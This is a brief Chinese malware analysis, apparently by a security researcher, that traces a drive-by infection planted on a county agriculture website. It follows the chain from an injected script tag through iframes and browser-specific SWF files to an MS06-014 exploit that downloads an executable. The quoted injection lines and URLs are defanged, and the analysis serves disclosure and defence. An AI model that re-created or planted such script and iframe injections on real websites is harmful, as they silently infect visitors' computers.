某县农业信息网挂马 Worm.Win32.AutoRun.umf
网站首页包含代码:
/--- <script src=hxxp://w**.9*4sa**om*m*.com/js.js></script> ---/
#1 hxxp://w**.9*4sa**om*m*.com/js.js
输出代码:
/--- <iframe src=hxxp://w**.c**6*6f**.cn/swf.htm width=100 height=0></iframe> ---/
#1.1 hxxp://w**.c**6*6f**.cn/swf.htm
检测浏览器类型,如果是IE内核,则此显示ie.swf,否则显示ff.swf,并输出代码:
/--- <iframe src=x.htm width=60 height=0></iframe> ---/
#1.1.1 hxxp://w**.c**6*6f**.cn/ie.swf
#1.1.2 hxxp://w**.c**6*6f**.cn/ff.swf
#1.1.3 hxxp://w**.c**6*6f**.cn/x.htm
引入以下网页:
#1.1.3.1 hxxp://w**.c**6*6f**.cn/1.htm
利用ms-06014漏洞下载 hxxp://d**.w**uc**7*.com/xx.exe
